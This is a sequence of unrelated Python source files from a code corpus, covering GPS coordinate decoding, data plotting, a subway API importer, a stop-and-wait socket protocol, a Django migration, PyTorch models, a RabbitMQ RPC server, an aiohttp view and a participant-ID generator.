return (lat, decimal, latdir)\n\n\ndef longitudeRLS(longEW, longdeg):\n if longEW == \"0\":\n longdir = \"East\"\n sg = 1\n else:\n longdir = \"West\"\n sg = -1\n deg = float(bin2dec(longdeg)) / float(2)\n # print longdeg,bin2dec(longdeg)\n decimal = sg * deg\n if deg > 180:\n if \"0\" not in longdeg:\n longe = decimal = \"Default - no location\"\n else:\n longe = decimal = \"Error >180 (Deg:{})\".format(decimal)\n else:\n longe = str(deg) + \" Degrees \" + longdir\n return (longe, decimal, longdir)\n\n\ndef latitude(latsono, latdeg, latmin):\n n = 1\n if latsono == \"1\":\n latdir = \"South\"\n sg = -1\n else:\n latdir = \"North\"\n sg = 1\n\n if len(latmin) == 5:\n n = 2\n elif len(latmin) == 4:\n n = 4\n elif len(latmin) == 2:\n n = 15\n\n minutes = float(bin2dec(latmin) * n)\n deg = float(bin2dec(latdeg))\n decimal = sg * (float(deg) + float(minutes / 60))\n if deg > 90:\n if \"0\" not in latdeg:\n lat = decimal = \"Default - no location\"\n else:\n lat = decimal = \"Error >90 (Deg:{})\".format(decimal)\n\n else:\n\n lat = str(int(deg)) + \" Degrees \" + str(int(minutes)) + \" Minutes \" + latdir\n\n return (lat, decimal, latdir, minutes)\n\n\ndef bin2hex(binval):\n \"\"\"Convert binary to hexadecimal\n\n Args:\n binval (str): binary data in string format\n Returns:\n hex_str (str): hexadecimal string\"\"\"\n\n hex_str = \"{:0{}X}\".format(int(binval, 2), len(binval) // 4)\n\n return hex_str\n\n\ndef longitude(longeswe, longdeg, longmin):\n n = 1\n if longeswe == \"0\":\n lngdir = \"East\"\n sg = 1\n else:\n lngdir = \"West\"\n sg = -1\n\n if len(longmin) == 5:\n n = 2\n elif len(longmin) == 4:\n n = 4\n elif len(longmin) == 2:\n n = 15\n minutes = float(bin2dec(longmin) * n)\n deg = float(bin2dec(longdeg))\n decimal = sg * (float(deg) + float(minutes / 60))\n if deg > 180:\n if \"0\" not in longdeg:\n\n lng = decimal = \"Default - no location\"\n\n else:\n lng = decimal = \"Error! 
> 180 (Deg:{})\".format(decimal)\n\n else:\n\n lng = str(int(deg)) + \" Degrees \" + str(int(minutes)) + \" Minutes \" + lngdir\n\n # decimal=deg + float( minutes / 60 )\n\n return (lng, decimal, lngdir, minutes)\n\n\ndef latlongdir(direction):\n if direction in [\"South\", \"West\"]:\n return -1\n else:\n return 1\n\n\ndef samplehex():\n b = \"10001100110110010\"\n\n c = \"0000000110000010110000001000001111001011010011010000011011011110011011100011100000001111000101110110011\"\n return bin2hex(b + c), len(b + c)\n\n\n# print(hextobin('3DA6D7095BCAB000AB000ABE000000000004'))\n","sub_path":"my_packages/decodefunctions.py","file_name":"decodefunctions.py","file_ext":"py","file_size_in_byte":11090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115865814","text":"\"\"\"\nThis script gets the xls files from my ply and plots them into a good looking graph\nby Sinai Sacharen\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os\nfrom datetime import datetime\n\nplt.style.use('fivethirtyeight')\n\nfolder_path = 'C:/Users/User/Documents/school/project/' # must end with a /\nif os.path.exists(folder_path):\n print('found path')\nelse:\n print('cant find path')\n\nxls = pd.ExcelFile(folder_path + 'excel_2020-03-23_102407.xlsx')\ndf1 = pd.read_excel(xls, 'RO_Shafdan_1')\ndf2 = pd.read_excel(xls, 'RO_Shafdan_2')\n\n# clean df1\nhead_list = list(df1)\nfor col in head_list:\n if col not in ['Time', 'Pressure - Bar', 'Flow rate - gr/l']:\n df1.drop([col], axis=1, inplace=True)\n\ndf1.rename(columns={\"Pressure - Bar\": \"Pressure [bar]\", \"Flow rate - gr/l\": \"Flow rate [ml/hr]\"}, inplace=True)\n#df1['Time'] = df1['Time'].apply(lambda x: datetime.datetime.fromtimestamp(x))\n# calculating hour mean for flow and pressure\ndf1.set_index('Time',inplace=True,drop=True)\ndf1_mean = df1.resample('H').mean()\ndf1_mean.reset_index(inplace=True)\ndf1_mean['sys'] = df1_mean['Time'].apply(lambda x: 'sys_1')\ndf1 = df1_mean\ndf1.drop(df1[df1['Flow rate [ml/hr]'] >120].index, inplace=True)\n\n# clean df2\nhead_list = list(df2)\nfor col in head_list:\n if col not in ['Time', 'Pressure - Bar', 'Flow rate - gr/l']:\n df2.drop([col], axis=1, inplace=True)\ndf2.rename(columns={\"Pressure - Bar\": \"Pressure [bar]\", \"Flow rate - gr/l\": \"Flow rate [ml/hr]\"}, inplace=True)\ndf2.set_index('Time',inplace=True,drop=True)\ndf2_mean = df2.resample('H').mean()\ndf2_mean.reset_index(inplace=True)\ndf2_mean['sys'] = df2_mean['Time'].apply(lambda x: 'sys_2')\ndf2 = df2_mean\ndf2.drop(df2[df2['Flow rate [ml/hr]'] >120].index, inplace=True)\n\n\n# Plot the lines\nfig, ax1 = plt.subplots(figsize=(15,8))\n\nplt.title('sys_1 vs sys_2',fontsize=20)\nax1.set_xlabel('time', fontsize=16)\nax1.set_ylabel(\"Pressure [bar]\",fontsize=16)\nax1.plot(df1['Time'], df1[\"Pressure [bar]\"], c='brown',label= 'Pressure sys1')\nax1.plot(df2['Time'], df2[\"Pressure [bar]\"], color='red',label= 'Pressure sys2')\n\nax1.tick_params(axis='y')\n\nax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n\n\nax2.set_ylabel('Flow rate [ml/hr]',fontsize=16) # we already handled the x-label with ax1\nax2.plot(df1['Time'], df1['Flow rate [ml/hr]'], color='teal',label= 'Flow sys1')\nax2.plot(df2['Time'], df2['Flow rate [ml/hr]'], color='blue',label= 'Flow sys2')\n\nax2.tick_params(axis='y')\n\nlines, labels = ax1.get_legend_handles_labels()\nlines2, labels2 = ax2.get_legend_handles_labels()\nax2.legend(lines + lines2, labels 
+ labels2, loc='center left', bbox_to_anchor=(1.075, 0.5))\n\nax1.grid()\n\nfig.tight_layout() # otherwise the right y-label is slightly clipped\n# plt.show()\nplt.savefig(folder_path + 'sys_1 vs sys_2.jpg')\n\n# ploy every system by itself--------------------------------------------------------------\npieces = {'sys_1': df1, 'sys_2': df2}\n\ndf_piece = pd.concat(pieces, sort=False)\ndf_piece['Time'] = df_piece['Time'].values.astype(float)\n\nplt.subplots(figsize=(15,8))\nsns.lineplot(x=\"Time\", y=\"Flow rate [ml/hr]\",\n hue=\"sys\",\n data=df_piece)\nplt.title('Flow rate',fontsize=20)\nfig.tight_layout() # otherwise the right y-label is slightly clipped\nplt.savefig(folder_path + 'Flow rate.jpg')\n\nplt.subplots(figsize=(15,8))\nplt.style.use('ggplot')\nsns.lineplot(x=\"Time\", y=\"Pressure [bar]\",\n hue=\"sys\",\n data=df_piece)\nplt.title('Pressure',fontsize=20)\nfig.tight_layout() # otherwise the right y-label is slightly clipped\nplt.savefig(folder_path + 'Pressure.jpg')\n\n","sub_path":"project_ro.py","file_name":"project_ro.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331305246","text":"__author__ = 'aj'\n# -*- coding: UTF-8 -*-\n\nfrom externapi.seoul.imports.import_base import *\nfrom externapi.seoul.SubwayOpenApi import *\nfrom externapi.seoul.DbSubwaySeoul import DbSeoulSubway\nimport unittest\n\n# 모든 라인의 지하철역 목록을 REST 요청하고, 해당결과를 DB 에 저장한다.\ndef importStart():\n\n dss = DbSeoulSubway()\n if dss.open_api_service_connection() is False:\n raise OpenServiceDataImporterException(\"Can't not Open Database Connection\")\n\n svc_nm = SB_SERVICE.SVC_SEARCHSTNBYSUBWAYLINESERVICE\n\n lines = SB_API_PARAM.LINE_NUM.list()\n for line in lines:\n req_loop = SB_API_RequestMaker.get_request_byservice(svc_nm)\n req_loop.START_INDEX = 0\n req_loop.END_INDEX = -1\n req_loop.LINE_NUM = line[K_KEY]\n\n _Save2Db(svc_nm, req_loop, dss)\n\n dss.close_api_service_connection(True)\n return True\n\n# 지하철라인별로 REST 서비스를 요청한다.\ndef _Save2Db(svc_nm, req_loop, dss):\n _REQ_DATA_SIZE = 1000\n while True :\n req_loop.START_INDEX = (req_loop.END_INDEX + 1)\n req_loop.END_INDEX = req_loop.START_INDEX + (_REQ_DATA_SIZE-1)\n\n resp = SbOpenApi.getServiceData(req_loop)\n totalcnt = resp.list_total_count\n if resp.row.__len__() == 0:\n return\n\n # Save to Database\n dss.import_api_service_data(svc_nm, resp.row)\n\n # Last phase\n if req_loop.END_INDEX+1 >= totalcnt:\n return\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"externapi/seoul/imports/import_SeachStationBySubwayLineService.py","file_name":"import_SeachStationBySubwayLineService.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617819960","text":"import json\nimport os\nimport pickle\nfrom datetime import datetime\n\n\ndef main_timer(func):\n def function_wrapper():\n start_time = datetime.now()\n print(f'Start Time: {start_time.strftime(\"%A %m/%d/%Y %H:%M:%S\")}')\n\n func()\n\n end_time = datetime.now()\n print(f'End Time: {end_time.strftime(\"%A %m/%d/%Y %H:%M:%S\")}')\n print(f'Total runtime: {end_time - start_time} (HH:MM:SS)')\n\n return function_wrapper\n\n\ndef load_pickle(file):\n \"\"\"Load the datum pickle and returns as a dataframe\n\n Args:\n file (string): labels pickle from 247-decoding/tfs_pickling.py\n\n Returns:\n DataFrame: pickle contents returned as dataframe\n \"\"\"\n with open(file, 'rb') as fh:\n datum = 
pickle.load(fh)\n\n    return datum\n\n\ndef write_config(dictionary):\n    \"\"\"Write configuration to a file\n    Args:\n        CONFIG (dict): configuration\n    \"\"\"\n    json_object = json.dumps(dictionary, sort_keys=True, indent=4)\n\n    config_file = os.path.join(os.path.join(os.getcwd(), 'results'),\n                               'config.json')\n    with open(config_file, \"w\") as outfile:\n        outfile.write(json_object)\n","sub_path":"code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"117436026","text":"\"\"\"\nWhere solution code to project should be written. No other files should\nbe modified.\n\"\"\"\n\nimport socket\nimport io\nimport time\nimport typing\nimport struct\nimport util\nimport util.logging\nimport threading\nfrom threading import Timer\nfrom queue import Queue \nimport errno\n\ndef send(sock: socket.socket, data: bytes):\n    \"\"\"\n    Implementation of the sending logic for sending data over a slow,\n    lossy, constrained network.\n\n    Args:\n        sock -- A socket object, constructed and initialized to communicate\n                over a simulated lossy network.\n        data -- A bytes object, containing the data to send over the network.\n    \"\"\"\n    global pkt\n    \n    def setInterval(interval):\n        def decorator(function):\n            def wrapper(*args, **kwargs):\n                stopped = threading.Event()\n\n                def loop(): # executed in another thread\n                    while not stopped.wait(interval): # until stopped\n                        function(*args, **kwargs)\n\n                t = threading.Thread(target=loop)\n                t.daemon = True # stop if the program exits\n                t.start()\n                return stopped\n            return wrapper\n        return decorator\n\n    \n    wait = False\n\n    @setInterval(4) ##15\n    def function():\n        nonlocal ack_recv\n        nonlocal wait \n        nonlocal rounds \n        nonlocal seqNum\n        \n        if ((ackWait == 0 and ack_recv == 0) or rounds == 0): ##Packet not received, so resend \n            sock.send(pkt)\n            logger.info(\"Packet not received...Resending packet\")\n            ##seqNum = seqNum - 1 \n        elif(ack_recv == 1 ): ##Packet received, so the timer should not send another packet\n            ##sock.send(ACK.to_bytes(1,'big'))\n            logger.info(\"Packet received in correct order\")\n            ack_recv = 0 \n        return\n\n    sock.setblocking(1)\n    ##sock.settimeout(20)\n    logger = util.logging.get_logger(\"project-sender\")\n    seqNum = 0\n    seqNumRecv = 0\n    chunk_size = util.MAX_PACKET - 2 ##util.MAX_PACKET \n    offsets = range(0, len(data), chunk_size) ##util.MAX_PACKET\n    ACK = 1\n    \n    ackWait = 0 \n    rounds = 0\n    Ack_Expected = 0 \n\n    for chunk in [data[i:i + chunk_size] for i in offsets]:\n\n        seqNumSend = seqNum.to_bytes(1, 'big')\n        pkt = bytearray(seqNumSend)\n        pkt = pkt + chunk \n        sock.send(pkt)\n        ack_recv = 0 \n        logger.info(\"Sending %s bytes\", len(pkt)) \n        logger.info(\"Waiting for %d seconds for ACK or Timeout\", 4)\n\n        while(ackWait == 0 ): ##Waiting for ACK state\n            ##sock.send(pkt)\n            ##print(\"ITS IN ACK WAITING MODE\") ##Debugging purposes \n            return_data = sock.recv(1)\n            stop = function() ##Starting sender timer\n\n            if (int.from_bytes(return_data,'big') == Ack_Expected ): ## if the packet is received correctly \n                ack_recv = 1 \n                logger.info(\"ACK received for packet %d\", seqNum)\n                temp = Ack_Expected \n                if(Ack_Expected == 0 ):\n                    Ack_Expected = 1 \n                elif(Ack_Expected == 1 ):\n                    Ack_Expected = 0\n                ackWait = 1\n\n        if ( seqNum == 0 ): ##Adjusting sequence numbers \n            seqNum = 1 \n        elif (seqNum == 1 ):\n            seqNum = 0 \n        ackWait = 0 \n        ##print(\"\\n \\n \\n round: \", rounds) ##Debugging action\n        ##rounds = rounds + 1 \n\n    \ndef recv(sock: socket.socket, dest: 
io.BufferedIOBase) -> int:\n    \"\"\"\n    Implementation of the receiving logic for receiving data over a slow,\n    lossy, constrained network.\n\n    Args:\n        sock -- A socket object, constructed and initialized to communicate\n                over a simulated lossy network.\n\n    Return:\n        The number of bytes written to the destination.\n    \"\"\"\n    global ACK\n\n    expectedSeqnum = 0\n\n    logger = util.logging.get_logger(\"project-receiver\")\n    num_bytes = 0 \n    ##sock.settimeout(15)\n    ##sock.setblocking(1)\n    global ack_recv\n    ack_recv = 0\n    while True:\n        try:\n            data = sock.recv(util.MAX_PACKET) ##util.MAX_PACKET\n            if not data:\n                break \n        except socket.error as e:\n            err = e.args[0]\n            if(err == errno.EAGAIN or err == errno.EWOULDBLOCK):\n                time.sleep(1) \n                ##print('No data available')  ##If the first packet is dropped, recv should catch the exception and continue listening for the retransmission\n                continue \n        else: \n            logger.info(\"received %d bytes\" , len(data))\n            recvSeqnum = data[0]\n            data = data[1:len(data)]\n            logger.info(\"Received sequence number %d, expecting sequence number %d \", recvSeqnum, expectedSeqnum)\n\n            if(recvSeqnum == expectedSeqnum): ## Send ACK for a correctly received packet from the sender\n                ACK = recvSeqnum \n                sock.send(ACK.to_bytes(1,'big'))\n                logger.info(\"Sending ACK for packet %d\", recvSeqnum)\n                if (expectedSeqnum == 0):\n                    expectedSeqnum = 1 \n                elif (expectedSeqnum == 1 ):\n                    expectedSeqnum = 0 \n                dest.write(data)\n                num_bytes += len(data)\n\n            else: ##Detect a duplicate from a lost ACK or a premature timeout of the sender timer \n                logger.info(\"Duplicate detected...not writing data\")\n                expectedSeqnum = recvSeqnum\n                ACK = expectedSeqnum\n                sock.send(ACK.to_bytes(1, 'big'))\n                if (expectedSeqnum == 0 ):\n                    expectedSeqnum = 1 \n                elif(expectedSeqnum == 1 ):\n                    expectedSeqnum = 0 \n\n            dest.flush()\n    return num_bytes \n    ","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"519214346","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='wp_image',\n            fields=[\n                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n                ('image', models.FileField(upload_to='/img', help_text='The file for the image.', verbose_name='image')),\n                ('image_id', models.CharField(blank=True, db_index=True, max_length=255, help_text='Image ID for building urls.', verbose_name='image id')),\n                ('publish_date', models.DateTimeField(default=datetime.datetime.now, help_text='When the image was uploaded.', verbose_name='publish date')),\n                ('height', models.IntegerField(blank=True, default=0, help_text='The height for the image.', verbose_name='height')),\n                ('width', models.IntegerField(blank=True, default=0, help_text='The width for the image.', verbose_name='width')),\n                ('album', models.CharField(blank=True, default='', max_length=255, help_text='Album name for this image.', verbose_name='album')),\n                ('title', models.CharField(blank=True, default='', max_length=255, help_text='Title for the image.', verbose_name='title')),\n                ('description', models.TextField(help_text='Description for this image.', verbose_name='description')),\n                ('disabled', models.BooleanField(default=False, help_text='Whether or not this image is 
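Taken together, `send` and `recv` above implement a stop-and-wait (alternating-bit) protocol: each chunk carries a one-byte sequence header, the receiver echoes that byte as the ACK, and the sender retransmits until the expected ACK arrives. The sketch below condenses the sender side of that framing, using a plain socket timeout in place of the background timer thread; `MAX_PACKET` stands in for the project's `util.MAX_PACKET`:

import socket

MAX_PACKET = 1400  # assumption; the project defines util.MAX_PACKET

def send_stop_and_wait(sock: socket.socket, data: bytes, timeout: float = 4.0) -> None:
    sock.settimeout(timeout)
    seq = 0
    chunk_size = MAX_PACKET - 1          # one byte reserved for the header
    for i in range(0, len(data), chunk_size):
        pkt = bytes([seq]) + data[i:i + chunk_size]
        while True:
            sock.send(pkt)               # (re)transmit the framed chunk
            try:
                ack = sock.recv(1)
            except socket.timeout:
                continue                 # lost packet or lost ACK: retry
            if ack and ack[0] == seq:
                break                    # acknowledged: move to the next chunk
        seq ^= 1                         # alternate the sequence bit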
listable.', verbose_name='disabled')),\n ('private', models.BooleanField(default=False, help_text='Whether or not this image is private (not listable).', verbose_name='private')),\n ('view_count', models.IntegerField(default=0, help_text='How many times this image has been viewed.', verbose_name='view count')),\n ],\n options={\n 'get_latest_by': 'publish_date',\n 'verbose_name': 'Image',\n 'db_table': 'wp_images',\n 'ordering': ['-publish_date'],\n 'verbose_name_plural': 'Images',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"img/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"191595724","text":"from torch import nn\nimport torch\nfrom torch.nn import functional as F\nfrom boardlaw.heads import scatter_values\n\nclass ReZeroResidual(nn.Linear):\n\n def __init__(self, width):\n super().__init__(width, width)\n nn.init.orthogonal_(self.weight, gain=2**.5)\n self.register_parameter('α', nn.Parameter(torch.zeros(())))\n\n def forward(self, x, *args, **kwargs):\n return x + self.α*F.relu(super().forward(x))\n\nclass FCModel(nn.Module):\n\n def __init__(self, boardsize, width=256, depth=20):\n super().__init__()\n\n blocks = [nn.Linear(2*boardsize**2, width)]\n for _ in range(depth):\n blocks.append(ReZeroResidual(width))\n self.body = nn.Sequential(*blocks) \n\n self.value = nn.Linear(width, 1)\n\n def forward(self, obs, seats):\n obs = obs.flatten(1)\n neck = self.body(obs)\n v = self.value(neck).squeeze(-1)\n return scatter_values(torch.tanh(v), seats)\n\nclass ReZeroConv(nn.Conv2d):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, padding=1, stride=1, kernel_size=3, **kwargs)\n self.register_parameter('α', nn.Parameter(torch.zeros(())))\n\n def forward(self, x, *args, **kwargs):\n return x + self.α*F.relu(super().forward(x))\n\nclass ConvModel(nn.Module):\n\n def __init__(self, boardsize, width, depth=16):\n super().__init__()\n\n layers = [nn.Conv2d(2, width, 3, 1, 1)]\n for l in range(depth):\n layers.append(ReZeroConv(width, width))\n layers.append(nn.Conv2d(width, 1, 3, 1, 1))\n self.layers = nn.ModuleList(layers)\n\n self.value = nn.Linear(boardsize**2, 1)\n\n def forward(self, obs, seats):\n B, boardsize, boardsize, _ = obs.shape\n x = obs.permute(0, 3, 1, 2)\n for l in self.layers:\n x = l(x)\n x = x.reshape(B, -1)\n v = self.value(x.flatten(1)).squeeze(-1)\n return scatter_values(torch.tanh(v), seats)\n\nclass FCConvModel(nn.Module):\n\n def __init__(self, boardsize, width=256, depth=20, conv_width=16):\n super().__init__()\n\n legs = [nn.Conv2d(2, conv_width, 3, 1, 1)]\n for l in range(depth//2):\n legs.append(ReZeroConv(conv_width, conv_width))\n legs.append(nn.Conv2d(conv_width, 4, 3, 1, 1))\n self.legs = nn.ModuleList(legs)\n\n body = [nn.Linear(4*boardsize**2, width)]\n for _ in range(depth//2):\n body.append(ReZeroResidual(width))\n self.body = nn.Sequential(*body) \n\n self.value = nn.Linear(width, 1)\n\n def forward(self, obs, seats):\n x = obs.permute(0, 3, 1, 2)\n for l in self.legs:\n x = F.relu(l(x))\n x = x.flatten(1)\n neck = self.body(x)\n v = self.value(neck).squeeze(-1)\n return scatter_values(torch.tanh(v), seats)\n\n","sub_path":"experiments/architecture/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"93598398","text":"#!/usr/bin/env python\n# -*- coding: 
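`ReZeroResidual` and `ReZeroConv` above both apply the ReZero trick: the residual branch is scaled by a learnable scalar α initialized to zero, so every block starts out as the identity map and deep stacks stay trainable. A minimal self-contained sketch of the same idea:

import torch
from torch import nn
from torch.nn import functional as F

class ReZeroBlock(nn.Module):
    def __init__(self, width: int):
        super().__init__()
        self.lin = nn.Linear(width, width)
        self.alpha = nn.Parameter(torch.zeros(()))  # alpha = 0 -> identity at init

    def forward(self, x):
        return x + self.alpha * F.relu(self.lin(x))

x = torch.randn(8, 256)
assert torch.allclose(ReZeroBlock(256)(x), x)  # identity before training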
utf-8 -*-\nimport pika\nimport requests\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='queue_exist_period')\n\ndef check_period(id_period):\n\n    url = \"http://127.0.0.1:8001/uv-domjudge/v1/periods/\"+id_period\n\n    response = requests.get(url)\n\n    print(\"from check_period\")\n\n    return str(response.status_code).encode('utf-8')\n\n\ndef on_request(ch, method, props, body):\n    id_period = body.decode('utf-8')\n\n    print(\"Get current period\")\n    response = check_period(id_period)\n    print(response)\n\n    ch.basic_publish(exchange='',\n                     routing_key=props.reply_to,\n                     properties=pika.BasicProperties(correlation_id = \\\n                                                         props.correlation_id),\n                     body=response)\n    ch.basic_ack(delivery_tag = method.delivery_tag)\n\nchannel.basic_qos(prefetch_count=1)\nchannel.basic_consume(on_request, queue='queue_exist_period')\n\nprint(\" [x] Awaiting RPC requests\")\nchannel.start_consuming()\n\n\n\"\"\"\nfrom server import server_courses\n\"\"\"","sub_path":"server/server_professor_exist_period.py","file_name":"server_professor_exist_period.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"489221623","text":"from bson.json_util import dumps\nfrom aiohttp import web\nfrom admin.models import Quote\n\n\nclass Collection(web.View):\n\n    def encode(self, data):\n        return dumps(data, indent=4).encode('utf-8')\n\n    async def get(self):\n        quote = Quote(db=self.request.db, data={})\n        all_quotes = await quote.all()\n        return web.Response(status=200,\n                            body=self.encode(\n                                data={'quotes': all_quotes}),\n                            content_type='application/json')\n\n    async def post(self):\n        data = await self.request.post()\n        quote = Quote(self.request.db, data)\n        result = await quote.create_quote()\n        all_quotes = await quote.all()\n        return web.Response(status=200,\n                            body=self.encode(\n                                data={'quotes': all_quotes}),\n                            content_type='application/json')","sub_path":"admin/views/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"293917335","text":"import csv\nimport hashlib\nimport time\nfrom itertools import permutations\nfrom os import fspath\n\nimport numpy as np\nimport pandas as pd\n\nimport rvoldefinitions as rvdef\n\npd.set_option('display.max_columns', None)\n\n\n# helper functions\ndef isduplicate(inp):\n    \"\"\"Checks for duplicates for an input list\"\"\"\n    dups = set([e for e in inp if inp.count(e) > 1])\n    return list(dups)\n\n\ndef generate_onid(onidlist, rvid):\n    \"\"\"Generate a deterministic OpenNeuro ID from an RVol ID, avoiding duplicates\"\"\"\n    hashcode = int(hashlib.sha256(rvid.encode('utf-8')).hexdigest(), 16) % 100000\n    perms = set([''.join(c) for c in permutations(str(hashcode))])\n    perms = sorted([int(p) for p in perms], reverse=True)\n    ctr = 0\n    onid = f'ON{perms[ctr]:05d}'\n    # check for any potential duplicates\n    while onid in onidlist:\n        ctr += 1\n        onid = f'ON{perms[ctr]:05d}'\n    return onid\n\n\nif __name__ == \"__main__\":\n    id_linking_df = rvdef.id_mapping\n\n    # reading in CTDB data as a dictionary of dataframes. Each dataframe contains responses to questionnaires.\n    # 'SUBJECT_NUMBER' field contains the RVIDs of the participants. 
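The script above is the server half of the classic RabbitMQ RPC pattern: it consumes 'queue_exist_period' and publishes its reply to `props.reply_to`, echoing the `correlation_id`. A hedged sketch of a matching client, written in the same pre-1.0 pika style as the server (the period id '42' is hypothetical):

import uuid
import pika

connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
result = channel.queue_declare(exclusive=True)   # private reply queue
callback_queue = result.method.queue

response = None
corr_id = str(uuid.uuid4())

def on_response(ch, method, props, body):
    global response
    if props.correlation_id == corr_id:          # ignore stale replies
        response = body

channel.basic_consume(on_response, queue=callback_queue, no_ack=True)
channel.basic_publish(exchange='',
                      routing_key='queue_exist_period',
                      properties=pika.BasicProperties(reply_to=callback_queue,
                                                      correlation_id=corr_id),
                      body='42')                 # hypothetical period id
while response is None:
    connection.process_data_events()
print(response)                                  # HTTP status as bytes, e.g. b'200'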
\n    ctdb_all_df = pd.read_excel(rvdef.filepaths.ctdb_data_dir, skiprows=[1], sheet_name=None)\n    onid_mapping = {}\n    unique_rvids_in_data = set()  # set of unique RVol IDs\n\n    # crawl through all ctdb forms to find list of unique RVIDs\n    for form, df in ctdb_all_df.items():\n        df['participant_id'] = df[' ']\n        del df[' ']\n        for ind, snum in df['participant_id'].items():\n            unique_rvids_in_data.add(snum)\n\n    print(f'No. of unique subjects across CTDB questionnaires is {len(unique_rvids_in_data)}')\n    unique_rvids_in_id_file = id_linking_df['SUBJECT_NUMBER']\n    existing_onids = id_linking_df['open_neuro_id'].tolist()\n\n    # gives a list of rvids in ctdb data NOT present in id_linking_file\n    no_onids_subjs = np.setdiff1d(list(unique_rvids_in_data), unique_rvids_in_id_file).tolist()\n\n    # verifies if there are any duplicate openneuro_ids in the current id_linking_file\n    dupes = isduplicate(existing_onids)\n    if dupes:\n        print(dupes)\n        print(f'ALERT! There are duplicates in your id_linking_file. Inspect it for these IDs {dupes} \\\n                and find a resolution before proceeding')\n    else:\n        for ind, rvid in unique_rvids_in_id_file.items():\n            onid_mapping[rvid] = id_linking_df.at[ind, 'open_neuro_id']\n\n    if no_onids_subjs:\n        for rvid in no_onids_subjs:\n            onid = generate_onid(existing_onids, rvid)\n            existing_onids.append(onid)\n            onid_mapping[rvid] = onid\n\n    # writing to a csv file\n    timestr = time.strftime('%Y%m%d_%H%M%S')\n    with open(fspath(rvdef.filepaths.data_dir.joinpath('id_files', 'id_linking_file_' + timestr + '.csv')), 'w',\n              newline='') as csvfile:\n        header = ['SUBJECT_NUMBER', 'open_neuro_id']\n        writer = csv.DictWriter(csvfile, fieldnames=header)\n        writer.writeheader()\n        for key, value in onid_mapping.items():\n            writer.writerow({'SUBJECT_NUMBER': key, 'open_neuro_id': value})\n","sub_path":"phenotype_data_prep_scripts/00_generate_openneuro_ids.py","file_name":"00_generate_openneuro_ids.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"305904589","text":"from datetime import datetime\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\nfrom src.model.mapsed import MAPSED\nfrom src.model.vae.conv_vae import ConvVAE\nfrom src.utils.calculate_seq_loss import calculate_seq_loss\nfrom src.utils.load_data import load_seq_data, normalize_data\n\n\ndef save_progress(model, train_losses, train_nce, train_recon, train_losses_dicts_mean,\n                  train_losses_dicts_var, test_losses_dicts_mean, test_losses_dicts_var):\n    model_path = '../saved_models/VAN/mapsed-No-Contrast.torch'\n    torch.save(model.state_dict(), model_path)\n\n    metric_dict = {'training loss': train_losses,\n                   'training nce': train_nce,\n                   'training recon': train_recon}\n\n    for me in metrics:\n        metric_dict['train {}(mean)'.format(me)] = np.stack(train_losses_dicts_mean[me])\n        metric_dict['train {}(std)'.format(me)] = np.stack(train_losses_dicts_var[me])\n        metric_dict['test {}(mean)'.format(me)] = np.stack(test_losses_dicts_mean[me])\n        metric_dict['test {}(std)'.format(me)] = np.stack(test_losses_dicts_var[me])\n\n    df_result = pd.DataFrame(metric_dict)\n    df_result.index.name = 'epochs'\n    df_result.index = df_result.index + 1\n\n    df_result.to_csv('../saved_models/VAN/mapsed-No-Contrast.csv')\n\n\ndevice = torch.device('cuda')\n\nseq_train, seq_test, _ = load_seq_data('VAN')\nmean = seq_train.mean(axis=(0,1,3,4))\nseq_train = normalize_data(seq_train, mean)\nseq_test = 
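`generate_onid` above derives IDs deterministically: the SHA-256 digest of the participant ID is reduced modulo 100000 to a five-digit code, and digit permutations of that code are tried (largest first) until an unused one is found. A worked example of the hashing step (the RVID shown is hypothetical):

import hashlib

rvid = "RV0001"  # hypothetical participant ID
code = int(hashlib.sha256(rvid.encode("utf-8")).hexdigest(), 16) % 100000
print(f"ON{code:05d}")  # the same rvid always yields the same base code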
